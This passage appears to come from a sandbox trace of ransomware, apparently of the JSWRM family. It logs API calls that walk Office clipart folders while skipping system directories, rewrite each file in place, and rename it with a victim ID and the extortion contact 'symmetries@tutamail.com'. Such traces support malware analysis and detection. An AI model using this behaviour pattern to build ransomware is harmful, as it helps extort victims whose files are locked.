lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00372_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00372_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00372_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00372_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00372_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0076.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.064] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=792) returned 1 [0076.064] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x310) returned 0x203550 [0076.064] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x310, lpOverlapped=0x0) returned 1 [0076.066] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.066] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x310, lpOverlapped=0x0) returned 1 [0076.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0076.066] CloseHandle (hObject=0x460) returned 1 [0076.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0076.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0076.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0076.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0076.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0076.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.066] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0076.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.067] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00405_.WMF", cAlternateFileName="")) returned 1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2=".") returned 1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="..") returned 1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="...") returned 1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="windows") returned -1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="recovery") returned -1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="perflogs") returned -1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="documents and settings") returned -1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="system volume information") returned -1 [0076.067] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="msocache") returned -1 [0076.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0076.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00405_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00405_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00405_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0076.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00405_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00405_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00405_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.068] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17584) returned 1 [0076.068] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x44b0) returned 0x24c1d0 [0076.068] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x44b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x44b0, lpOverlapped=0x0) returned 1 [0076.071] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.071] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x44b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x44b0, lpOverlapped=0x0) returned 1 [0076.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.071] CloseHandle (hObject=0x460) returned 1 [0076.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0076.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0076.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0076.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0076.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.071] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.072] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00407_.WMF", cAlternateFileName="")) returned 1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2=".") returned 1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="..") returned 1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="...") returned 1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="windows") returned -1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="recovery") returned -1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="perflogs") returned -1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="documents and settings") returned -1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="system volume information") returned -1 [0076.072] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="msocache") returned -1 [0076.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0076.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00407_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00407_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00407_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0076.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00407_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00407_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00407_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.073] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7828) returned 1 [0076.073] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e90) returned 0x24c1d0 [0076.073] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1e90, lpOverlapped=0x0) returned 1 [0076.076] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.076] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1e90, lpOverlapped=0x0) returned 1 [0076.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.077] CloseHandle (hObject=0x460) returned 1 [0076.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0076.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0076.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0076.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0076.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0076.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.077] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0076.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.115] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa7f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00413_.WMF", cAlternateFileName="")) returned 1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2=".") returned 1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="..") returned 1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="...") returned 1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="windows") returned -1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="recovery") returned -1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="perflogs") returned -1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="documents and settings") returned -1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="system volume information") returned -1 [0076.115] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="msocache") returned -1 [0076.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0076.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00413_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00413_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00413_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0076.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00413_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00413_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00413_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.116] RtlAllocateHeap 